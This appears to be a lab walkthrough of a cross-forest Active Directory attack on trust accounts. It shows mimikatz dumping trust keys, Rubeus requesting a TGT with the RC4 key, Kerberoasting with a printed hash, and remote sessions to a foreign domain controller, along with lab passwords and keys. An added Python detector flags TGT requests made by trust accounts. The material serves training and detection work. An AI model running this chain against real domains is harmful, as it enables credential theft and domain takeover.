Cross-Forest Attack: Trust Accounts

1. Lab environment

VM                                  IP
SQL01 (SQL01.inlanefreight.ad)      10.129.5.253 (DHCP) / 172.16.118.10 (dual interface)
DC01 (DC01.inlanefreight.ad)        172.16.118.3
WS01 (WS01.child.inlanefreight.ad)  172.16.118.20
DC02 (DC02.logistics.ad)            172.16.118.252
SQL02 (SQL02.logistics.ad)          172.16.118.11
DC03 (DC03.megacorp.ad)             172.16.118.113


  • DC01 is the domain controller of inlanefreight.ad
  • DC02 is the domain controller of logistics.ad
  • DC03 is the domain controller of megacorp.ad

2. Trust accounts

When a one-way outbound trust is created from domain Forest-A to domain Forest-B, a trust account named A$ is created in Forest-B. With administrative rights and a tool such as mimikatz, the clear-text credentials and Kerberos keys of A$ can be obtained from the DC of either domain. The trust account (A$) created as part of the trust relationship has the rights of an ordinary domain user in Forest-B.


Suppose we have two domains, with a one-way outbound trust from logistics.ad to megacorp.ad. Administrators of the Megacorp domain can therefore access resources in the Logistics domain, but not the other way round.

However, a trust account megacorp\logistics$ is also created in megacorp.ad, with its primary group set to Domain Users. An administrator of the Logistics domain can use a tool such as mimikatz to extract the clear-text credentials of this trust account.

  • In a one-way trust, the trust account exists only in the trusted domain
  • The trust object (TDO) exists in both domains, and the stored key can be read from it
  • In a two-way trust, a trust account exists on both sides

3. Using the trust account for a cross-forest attack

3.1. Log in to the Logistics domain

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# proxychains -q evil-winrm -i 172.16.118.252 -u Administrator -p 'L0gistics_adm!'

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

3.2. Enumerate the trust

*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADTrust -Identity megacorp.ad


Direction               : Outbound
DisallowTransivity      : False
DistinguishedName       : CN=MEGACORP.AD,CN=System,DC=logistics,DC=ad
ForestTransitive        : True
IntraForest             : False
IsTreeParent            : False
IsTreeRoot              : False
Name                    : MEGACORP.AD
ObjectClass             : trustedDomain
ObjectGUID              : 90748280-8770-4a93-9dde-b5c18e14125b
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=logistics,DC=ad
Target                  : MEGACORP.AD
TGTDelegation           : False
TrustAttributes         : 8
TrustedPolicy           :
TrustingPolicy          :
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

  • logistics.ad has a one-way trust to MEGACORP.AD, so megacorp.ad can access logistics.ad

Because the trust is one-way outbound, the current domain cannot access megacorp.ad. For example, when we try to query megacorp.ad:

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami;hostname
logistics\administrator
DC02
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADUser Administrator -Server megacorp.ad
Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.
At line:1 char:1
+ Get-ADUser Administrator -Server megacorp.ad
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (Administrator:ADUser) [Get-ADUser], ADServerDownException
    + FullyQualifiedErrorId : ActiveDirectoryServer:0,Microsoft.ActiveDirectory.Management.Commands.GetADUser

3.3. Obtain the trust key

Because logistics.ad has a one-way trust to MEGACORP.AD, MEGACORP.AD holds a trust account logistics$, and we can use mimikatz on either domain to obtain the clear-text password associated with this account:

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimikatz.exe "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: LOGISTICS.AD (LOGISTICS / S-1-5-21-186204973-2882451676-2899969076)

Domain: INLANEFREIGHT.AD (INLANEFREIGHT / S-1-5-21-2432454459-173448545-3375717855)
 [  In ] LOGISTICS.AD -> INLANEFREIGHT.AD
    * 3/8/2026 9:57:27 PM - CLEAR   - b2 02 bb be 29 d3 36 80 c6 70 fb 00 11 ad cb aa 8d 63 ec 5e c7 3d 3c 6e 3f 3b b5 74 df 51 0c a6 c3 6a bc 35 ee 01 02 15 6c 4b 0c bd 2c e9 2b ed e5 68 f1 9a 68 49 3e be e9 ce 2c af 0a ec df 48 f2 4a 63 fb c0 f2 49 2a c3 ad f0 9f a3 8d f6 fd ea 9b 8d 49 5b 6f bf 4c ae 59 c5 98 05 ee b9 6f b1 53 60 d6 08 5b cb b2 48 6f 6b d9 5f d0 b3 5b c3 34 a2 dc 2f e1 6c e8 a4 75 2c 19 fd 14 b2 4a 3b 4a bb b6 7a b8 6d 0f a0 17 b1 9e 45 1e 5f ec 1f de 95 98 e4 2b e4 27 1b 5f 01 47 91 09 36 9a db 84 44 90 0b ab 40 de a6 a7 40 43 66 29 92 b6 c6 70 46 80 94 e7 bc 17 b1 e3 15 31 b7 4f 72 ee 78 02 d1 c0 a2 12 34 a4 4f 2c fb 2d 46 1b 20 5f 9c c5 7b 26 c6 ac 35 75 10 4e 39 c2 95 42 c6 19 a1 32 f6 f7 e4 0f 7a 1c de 7f 31 be cb 91 19 3f
        * aes256_hmac       d7de634aca2357f244350515f35aba3e4aa52c6ddd00d474c3594eff06bca11a
        * aes128_hmac       2bc900dd8447912056fa42d4471b3c6b
        * rc4_hmac_nt       396cd83211022f3924fc63c51a1d5e01

 [ Out ] INLANEFREIGHT.AD -> LOGISTICS.AD
    * 3/8/2026 9:57:52 PM - CLEAR   - 50 cd d7 65 02 14 32 37 a2 2c 21 95 37 04 26 c8 a6 3d 2b b0 ce 5d 40 74 e3 92 35 c9 a3 63 47 05 eb f5 64 80 7f 6e 42 e7 91 dd 57 f6 3d 48 f5 a9 58 62 89 4a 9c 9a 32 45 cd 5d ca 73 10 6a ea 45 78 15 3e 25 e3 d1 73 89 68 03 4c b8 5b 2b ec 96 96 08 5e 98 81 da 8d 68 36 38 15 03 77 e1 45 02 dc 5d 0e 4e bd 83 6c 72 f2 eb 82 dd d4 8b 32 44 09 28 85 d9 5b d4 f3 62 e0 04 da 2e be ad d1 14 75 81 5c f3 87 b9 21 b8 43 5a eb a7 e4 74 f3 b3 b2 04 85 37 bd 54 a5 d6 73 0a e5 cb 11 c8 06 0f 2d a5 0b 91 81 60 dd 80 a7 fb 86 f5 be b2 5a 27 cc 8f 6c fe 74 cc 2e 18 12 5e f9 b9 58 7b 19 25 12 9d 99 77 ff 27 3c d2 b7 5c a2 3c 59 db 57 d7 f8 7c 83 4e bc cb 95 a9 9c b9 f4 e0 b6 ca cc 17 04 28 ec c0 78 e4 10 a2 85 2a 86 de 16 ae 14 bf
        * aes256_hmac       a8ad4c4b04cb2f4e250ffa4383d6e7884f51a33546e070fc9848268795d5f593
        * aes128_hmac       17918ada093fcd2a09008d320b92a0fe
        * rc4_hmac_nt       f2b684243f0ccb483b024de875278005

 [ In-1] LOGISTICS.AD -> INLANEFREIGHT.AD
    * 5/12/2025 4:11:24 AM - CLEAR   - 2a 8e cf 78 60 3c 25 a2 3a d0 cf d1 7d ec 66 5c 1a 82 84 ac 34 91 24 78 39 cc 2f 09 dc 2a da 6c 72 a0 60 17 8b d9 be 13 68 64 f4 84 7a 66 14 9d b7 98 c2 e3 a1 e7 09 1d 4b 71 60 f0 e1 5a 45 7f 69 5e 97 bf cb c7 88 ab ba 2f 4f 2e 7e 8d 8e 10 6e b0 34 ed 91 c6 0e db fd df be 61 e2 1a 09 60 9d 0f 2f 6d c5 7a 86 78 1b 27 dd 3b 22 5f 34 02 69 37 7e 0f 68 b3 10 ef d2 3f d8 ab e7 5b f1 b6 0e 1f 84 63 3d 8d 82 99 ee 5b 67 3a fc ec a3 b2 fc 5b 43 e9 37 6b c7 6f 90 71 1d 91 24 1e 22 6c 6a 27 a4 27 f9 64 73 7b 84 1a 00 21 82 ca 21 f9 05 4e 15 38 4e 74 e0 80 bd b3 01 66 1c 09 84 68 bc d0 cd 73 28 53 e6 85 a7 41 e0 5f d2 c4 a3 e4 25 06 6b 05 c7 80 c0 86 f6 5c 44 9a 20 c8 c3 96 bb ed 01 71 dc 7f 17 76 a8 c3 f9 af 48 08 63 de
        * aes256_hmac       33e7995f339f8b4f045757bb3a8e867d81ddac2d2b8f331e7a00b3f98822f7a0
        * aes128_hmac       015f62ba873ecc161edb6309ebe354b1
        * rc4_hmac_nt       d7c33ad49871cd80807678f2a9c176be

 [Out-1] INLANEFREIGHT.AD -> LOGISTICS.AD
    * 3/8/2026 9:57:52 PM - CLEAR   - da bb 30 c1 ab 00 1d cd c0 4a 12 46 f0 d1 6a 1c 76 fb 7a d1 cd 44 a3 a2 d6 54 d6 04 55 31 54 6b 54 79 3c f3 ca e6 46 e7 ae 55 e7 63 c2 5d eb 4a ce 30 82 6e 8d 15 d3 51 52 a5 cb 13 33 6e 0d 0a d1 d4 d9 20 93 2d f0 cd 5b a7 60 f0 9f 01 d7 e6 65 84 28 08 65 ce fa e0 31 7b b4 46 39 53 83 a6 93 69 59 ac 4b df f7 43 71 2a c8 ae 06 14 19 5d 36 0e 9c d9 db b4 f9 c4 d3 ae fa 52 35 7f 54 29 c9 14 92 cf 93 37 1c 5b 4a d6 27 fd 2e 38 ad d0 38 f1 94 ba 4c 28 39 c8 93 52 4b 67 27 02 61 51 dc b0 55 42 64 ec 11 70 19 c5 05 75 b4 dc ca 40 47 bd 39 c7 12 23 5a a0 d1 e1 a3 41 3d 8f 9f 00 e0 80 89 fb 10 34 f5 05 bb 79 12 72 73 68 ba d1 cb 05 b9 d4 18 7c fa a6 93 72 a0 3c 7a 78 92 0f e1 ee 74 e1 7b 49 27 26 31 8e 70 89 3f 1f 9a 0d
        * aes256_hmac       9f34d042435b420ed9ae6084c52c0cf04d942f4cf8f2bede63c78f773a964697
        * aes128_hmac       9f04e10d64a3cfdb787af2add4d403d2
        * rc4_hmac_nt       af6745cb951641ff1bfe7f99f06b72fe


Domain: MEGACORP.AD (MEGACORP / S-1-5-21-983561975-2685977214-3442977283)
 [  In ] LOGISTICS.AD -> MEGACORP.AD

 [ Out ] MEGACORP.AD -> LOGISTICS.AD
    * 3/8/2026 9:57:52 PM - CLEAR   - bb b6 83 e7 79 ec 85 83 20 f5 52 92 2f ef d4 66 a8 cb 0a 8c b4 90 66 87 1f af 51 a7 99 25 ef 21 f5 d1 0e bb 86 e4 c9 c0 c0 80 31 7e b8 8a 2d e8 f8 fc 1e e1 fc a4 13 2c 0e 49 4e 63 6d ae 96 6e ca f5 3e 45 ff f5 47 7d a0 2b bd ca 3c 13 80 76 b8 2e 73 87 3d 88 23 31 6a bd ac ac 77 a8 a5 c8 ca 03 c7 35 a5 60 82 bb 71 66 1c 2f 8a bf 2e f0 93 a1 62 62 6d 23 4f 5f 2d 69 ec 74 28 49 64 1b 34 50 0b 20 97 f1 74 1e 50 ec 85 f0 ab cc 63 aa db eb 5d 57 10 3b c8 38 8b ee e6 80 49 c6 68 44 5d f9 d5 d1 65 75 4d fa 07 37 8e 4c 19 83 be fc cc 49 85 15 95 32 01 dd a1 41 b3 4d ce 39 0a c2 62 31 68 92 46 46 48 42 a8 38 44 18 e3 84 46 bb 94 2a e8 f1 7f d0 3b 2e 29 38 db 0b a6 c1 f3 c8 82 be fc d1 dc 8e 57 9c 61 33 4c f3 ca d6 50 91
        * aes256_hmac       7aee14b61b90a71dbc5a76a1d38261f1e473181168e8eacf828d5f0d3a8b46f4
        * aes128_hmac       f131a248a997b64eec4b38ff507470d6
        * rc4_hmac_nt       2afa9b3d6c6bf2193a8d854aaddd80b5

 [ In-1] LOGISTICS.AD -> MEGACORP.AD

 [Out-1] MEGACORP.AD -> LOGISTICS.AD
    * 3/8/2026 9:57:52 PM - CLEAR   - 35 b0 fd 69 ae 7e 7e ff 53 c3 ef c6 32 df bf 96 5e b6 18 83 8d 9a 1b ce b0 69 4b 82 fc b0 40 cd 45 ee be 59 f6 f1 c3 70 bb 80 20 8f f0 65 02 cb 79 9c 71 65 05 c5 ae 28 0a 01 34 a9 90 42 0a dc 8d 24 d2 d8 76 60 8b 54 34 80 ea 5c 18 76 97 6c c5 68 b5 34 df ad 14 a1 a0 fa b4 43 f4 ca 48 3a b0 4b 99 22 50 42 27 e0 23 a9 39 bc 5b 30 49 5c 67 0b 29 f9 38 25 86 4c 07 8f 4b f0 44 df 36 1f b7 1c b3 d4 f0 77 8c 7b ef ad cd ec c7 0c 44 ff dd 1a e9 86 d9 bd 13 7d da 25 1e 89 c3 5f 42 ed 38 3f 73 91 67 e7 00 c9 19 f6 8b 73 36 41 0d 91 ee ae aa 67 4e e5 13 8a ce 60 ad 55 27 71 58 ee 35 eb 53 d7 ce 01 f1 35 f9 de c5 4f dd c7 26 05 95 95 e5 5f 8c 57 d0 80 74 86 99 c8 f0 20 24 d9 71 7e 47 be 87 76 38 62 c2 8c 9d e4 a8 86 26 e9
        * aes256_hmac       f183f794bfac99880891cda37f73975171a9581212bbb20233e91a60f535eddf
        * aes128_hmac       b5d0216dceadb42b272a447c6951301a
        * rc4_hmac_nt       0a1b9d74107cb92796d2520c4611052c


mimikatz(commandline) # exit
Bye!

  • Out: the NewPassword attribute of the trusted domain object (TDO)
  • Out-1: the OldPassword attribute of the TDO
  • These attributes can be used to request a TGT

In our scenario the trusted domain object (TDO) is not logistics$ itself; it is an object of class trustedDomain in logistics.ad, located at CN=megacorp.ad,CN=System,DC=logistics,DC=ad. A matching TDO also exists in megacorp.ad: CN=logistics.ad,CN=System,DC=megacorp,DC=ad.

Both sides share the same trust key. Although a TDO exists in both domains, for a one-way trust the trust account is created only in the trusted domain.

For a newly created trust, the trust keys on both sides are usually identical; according to MS-ADTS section 6.1.6.9.6.1, the trust key is rotated automatically every 30 days. So here the keys are no longer identical, and the previous key is kept as well (both are valid).

The trust keys stored in the TDO are derived from the trust account's password. Specifically, the clear-text NewPassword trust key is the trust account's current password, and the OldPassword trust key is normally its previous password.

Because the salts differ, the Kerberos AES keys differ between the two domains, but the RC4 key is identical on both sides. So we can extract the RC4 trust key from the current domain and authenticate to megacorp.ad as megacorp.ad\logistics$.

3.4. Request a TGT with Rubeus

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\Rubeus.exe asktgt /user:logistics$ /domain:megacorp.ad /rc4:2afa9b3d6c6bf2193a8d854aaddd80b5 /ptt /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 2afa9b3d6c6bf2193a8d854aaddd80b5
[*] Building AS-REQ (w/ preauth) for: 'megacorp.ad\logistics$'
[*] Using domain controller: 172.16.118.113:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      <SNIP>
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/megacorp.ad
  ServiceRealm             :  MEGACORP.AD
  UserName                 :  logistics$ (NT_PRINCIPAL)
  UserRealm                :  MEGACORP.AD
  StartTime                :  3/9/2026 12:59:19 AM
  EndTime                  :  3/9/2026 10:59:19 AM
  RenewTill                :  3/16/2026 12:59:19 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  UNND+612y35dOs7ZiEmqBw==
  ASREP (key)              :  2AFA9B3D6C6BF2193A8D854AADDD80B5

*Evil-WinRM* PS C:\Users\Administrator\Documents> klist

Current LogonId is 0:0x2bf604

Cached Tickets: (1)

#0>     Client: logistics$ @ MEGACORP.AD
        Server: krbtgt/megacorp.ad @ MEGACORP.AD
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 3/9/2026 1:01:09 (local)
        End Time:   3/9/2026 11:01:09 (local)
        Renew Time: 3/16/2026 1:01:09 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Now we can talk to megacorp.ad:

PS C:\Users\Administrator\Documents> Get-ADUser Administrator -Server megacorp.ad

DistinguishedName : CN=Administrator,CN=Users,DC=MEGACORP,DC=AD
Enabled           : True
GivenName         :
Name              : Administrator
ObjectClass       : user
ObjectGUID        : afcf823b-3376-4f8f-be07-144b3664b4fb
SamAccountName    : Administrator
SID               : S-1-5-21-983561975-2685977214-3442977283-500
Surname           :
UserPrincipalName :
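From the detection side, the TGT request above is the step that stands out: in normal operation a trust account such as megacorp\logistics$ never sends its own AS-REQ (the KDCs only use its key for inter-realm referral tickets), so a 4768 event naming a trust account is a strong signal that someone holds the trust key. The following is an added example, not code from the original write-up; it assumes a flattened key=value export of the 4768/4769 events from DC03 and that the lab has only the logistics.ad trust, and the log lines are constructed.

```python
"""Flag Kerberos TGT requests (event 4768) made in the name of a trust
account. Added example, not from the original write-up: a trust account
such as megacorp\\logistics$ does not request its own TGT in normal
operation, so a 4768 whose TargetUserName is a trust account indicates
that the trust key is being used as in section 3.4 (Rubeus asktgt)."""
import re

# Trust partners of megacorp.ad as Get-ADTrust on DC03 would list them
# (assumption: the lab only has the logistics.ad trust).
TRUST_PARTNERS = ["logistics.ad"]


def trust_account_names(partners):
    """Trust accounts are named <NetBIOS name of partner>$. Assumes the
    NetBIOS name equals the first DNS label, which holds for this lab."""
    return {p.split(".")[0].upper() + "$" for p in partners}


# Constructed 4768/4769 records in flattened key=value form (not real logs).
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=white.beard TargetDomainName=MEGACORP.AD IpAddress=::ffff:172.16.118.50 TicketEncryptionType=0x12 PreAuthType=2
EventID=4768 TargetUserName=logistics$ TargetDomainName=MEGACORP.AD IpAddress=::ffff:172.16.118.252 TicketEncryptionType=0x12 PreAuthType=2
EventID=4769 TargetUserName=white.beard@MEGACORP.AD ServiceName=krbtgt/LOGISTICS.AD IpAddress=::ffff:172.16.118.50 TicketEncryptionType=0x12
EventID=4768 TargetUserName=DC03$ TargetDomainName=MEGACORP.AD IpAddress=::ffff:172.16.118.113 TicketEncryptionType=0x12 PreAuthType=2
"""

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened record into a dict of its fields."""
    return dict(FIELD.findall(line))


def find_trust_account_tgt_requests(log_text, partners=TRUST_PARTNERS):
    """Return (account, client_ip) for every 4768 whose requesting
    principal is a trust account of one of the given partners."""
    suspects = trust_account_names(partners)
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4768":
            continue  # only AS-REQs matter; TGS traffic for referrals is normal
        user = ev.get("TargetUserName", "").upper()
        if user in suspects:
            hits.append((user, ev.get("IpAddress", "").removeprefix("::ffff:")))
    return hits


if __name__ == "__main__":
    for account, ip in find_trust_account_tgt_requests(SAMPLE_EVENTS):
        print(f"ALERT: TGT requested as trust account {account} from {ip}")
```

In the constructed sample the only hit is logistics$ requesting a TGT from 172.16.118.252, the address of DC02, which is where the key was dumped and Rubeus was run in the walkthrough.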

3.5. Kerberoasting Megacorp

PS C:\Tools> .\Rubeus.exe kerberoast /domain:megacorp.ad

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain          : megacorp.ad
[*] Searching path 'LDAP://DC03.MEGACORP.AD/DC=megacorp,DC=ad' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 2
[*] SamAccountName         : black.beard
[*] DistinguishedName      : CN=black.beard,CN=Users,DC=MEGACORP,DC=AD
[*] ServicePrincipalName   : HTTP/WHITE.megacorp.ad:1433
[*] PwdLastSet             : 3/9/2024 3:02:40 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : 
$krb5tgs$23$*black.beard$MEGACORP.AD$HTTP/WHITE.megacorp.ad:1433@megacorp.ad*$5E
F3FCC09DDC4221424A15C53192C02A$FB035250A4DB98DFD80EA037242B821A4B24BA8C8D0B014BF
38E074DD0E04259F76B638C47889177B81E1E2B590F054B9A986B8CC62A5B978CE7ADFDD9BCD06BF
F270BAC15AF9C4BD4D4D8DA2C1453926EA056134E0ED925E46B7977B0524F88F9F6CF7C6A12FD15E
41CFDA14A6043D8FBB0BADB0576D42F21C8F1DC175970A3E60E3FA16624B0D76C8B9D1703852D4BD
41C305EC2279B7938CCAB9708EB1E9EC2431B2EABBEFC0BFB687A32B5C1CC4642E5A6B736D73DF4A
45FDAD2DEA42ABAF22D37CFAA3ACC1C981E09E2BE2A886286E9ABC22A6E3A434A5A45BE15FCD626A
6E34304540821D6B95A79E56ABCC2E6678AAB5DB8151F18A2D8C09CF258E7FC97A2624F26E345762
3C0AF9A2F01B4DBFDBFB911993C843FEA38B9379103959AAE3D679BDA71D0F5DC71816168CA31609
0B21B54D66F9F19C3C9EE80A2E630A9D995953A859B815A5106F141B2276BA13AF0964D91A0CB88B
687DF5EAD61504A0F11B1ADD4C55E94245D7901CFC54C8AFE956E87192EE99F4048BF3A4A71D4A70
<SNIP>


.\Rubeus.exe asktgt /user:white.beard /password:<SNIP> /domain:megacorp.ad /ptt

3.6. Accessing the Megacorp domain via PSSession

PS C:\Tools> New-PSSession DC03.megacorp.ad                                     

 Id Name            ComputerName    ComputerType    State         Configuration 
                                                                  Name          
 -- ----            ------------    ------------    -----         ------------- 
  2 Session2        DC03.megacor... RemoteMachine   Opened        Microsoft.... 


PS C:\Tools> Enter-PSSession DC03.megacorp.ad

[DC03.megacorp.ad]: PS C:\Users\white.beard\Documents> whoami
megacorp\white.beard